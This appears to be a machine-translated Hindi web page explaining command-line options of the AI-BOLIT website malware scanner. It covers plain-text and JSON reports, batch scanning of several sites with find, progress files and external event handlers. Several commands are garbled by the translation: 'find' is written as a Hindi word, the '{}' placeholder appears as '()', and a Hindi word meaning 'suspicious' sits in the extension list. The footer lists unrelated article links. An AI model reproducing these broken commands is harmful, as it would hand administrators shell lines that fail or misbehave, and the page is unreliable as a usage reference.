site1.txt नाम से सादे पाठ में एक रिपोर्ट प्राप्त करें

php ai-bolit.php -lsite1.txt

आप कॉल को संयोजित कर सकते हैं, उदाहरण के लिए,

php ai-bolit.php --size=300K --path=/home/s/site1/public_html/ --mode=2 --scan=php,phtml,pht,php5,pl,cgi,संदिग्ध

AI-BOLIT स्कैनर की कॉल को अन्य के साथ जोड़कर यूनिक्स आदेशों, उदाहरण के लिए, आप साइटों की बैच स्कैनिंग कर सकते हैं। नीचे एक खाते के भीतर होस्ट की गई कई साइटों की जाँच का एक उदाहरण दिया गया है। उदाहरण के लिए, यदि साइटें /var/www/user1/data/www निर्देशिका के अंदर स्थित हैं, तो स्कैनर लॉन्च करने का आदेश होगा

ढूंढें /var/www/user1/data/www -maxdepth 1 -type d -exec php ai-bolit.php --path=() --mode=2 \;

--रिपोर्ट पैरामीटर जोड़कर, आप उस निर्देशिका को नियंत्रित कर सकते हैं जिसमें स्कैन रिपोर्ट तैयार की जाएगी।

php ai-bolit.php पैरामीटरों की सूची... --eng

रिपोर्ट इंटरफ़ेस को अंग्रेजी में बदलें. यह पैरामीटर सबसे अंत में आना चाहिए.

अन्य सेवाओं के साथ और होस्टिंग पैनल में एकीकरण

php ai-bolit.php --json_report=/path/file.json

में एक रिपोर्ट तैयार करें json प्रारूप

php ai-bolit.php --progress=/path/progress.json

सत्यापन स्थिति को json प्रारूप में एक फ़ाइल में सहेजें। यह फ़ाइलइसमें json प्रारूप में संरचित डेटा शामिल होगा: वर्तमान स्कैन फ़ाइल, कितनी फ़ाइलें स्कैन की गई हैं, स्कैन करने के लिए कितनी फ़ाइलें शेष हैं, स्कैन प्रतिशत, स्कैनिंग पूरी होने तक का समय। इस तंत्र का उपयोग प्रगति पट्टी और पैनल में स्कैन की जा रही फ़ाइलों के बारे में डेटा दिखाने के लिए किया जा सकता है। एक बार स्कैन पूरा हो जाने पर, फ़ाइल स्वचालित रूप से हटा दी जाती है।

php ai-bolit.php --handler=/path/hander.php

बाहरी ईवेंट हैंडलर. आप अपना स्वयं का स्कैन प्रारंभ/अंत/स्कैन प्रगति/स्कैन त्रुटि हैंडलर जोड़ सकते हैं। एक उदाहरण फ़ाइल को स्कैनर संग्रह में, टूल्स/हैंडलर.php निर्देशिका में देखा जा सकता है। उदाहरण के लिए, स्कैनिंग पूरी होने के बाद, आप रिपोर्ट फ़ाइल के साथ कुछ कर सकते हैं (मेल द्वारा भेजें, संग्रह करें, आदि)।



मित्रों को बताओ
ट्विटर
ताजा...
अगला लेख
ये भी पढ़ें
सैमसंग में संपर्कों की ब्लैकलिस्ट
सैमसंग में संपर्कों की ब्लैकलिस्ट
2023-11-03 00:02:19
अपने कंप्यूटर को कैसे फ़ॉर्मेट करें ताकि विंडोज़ मिट न जाए
अपने कंप्यूटर को कैसे फ़ॉर्मेट करें ताकि विंडोज़ मिट न जाए
2023-11-03 00:02:19
हम स्वयं सर्वोत्तम डेटाबेस एकत्र करते हैं
हम स्वयं सर्वोत्तम डेटाबेस एकत्र करते हैं
2023-11-02 00:06:06
एसएमएफ द्वारा संचालित फोरम इंजन बेस्प्रावनी का स्वचालित पता लगाना
एसएमएफ द्वारा संचालित फोरम इंजन बेस्प्रावनी का स्वचालित पता लगाना
2023-11-02 00:06:06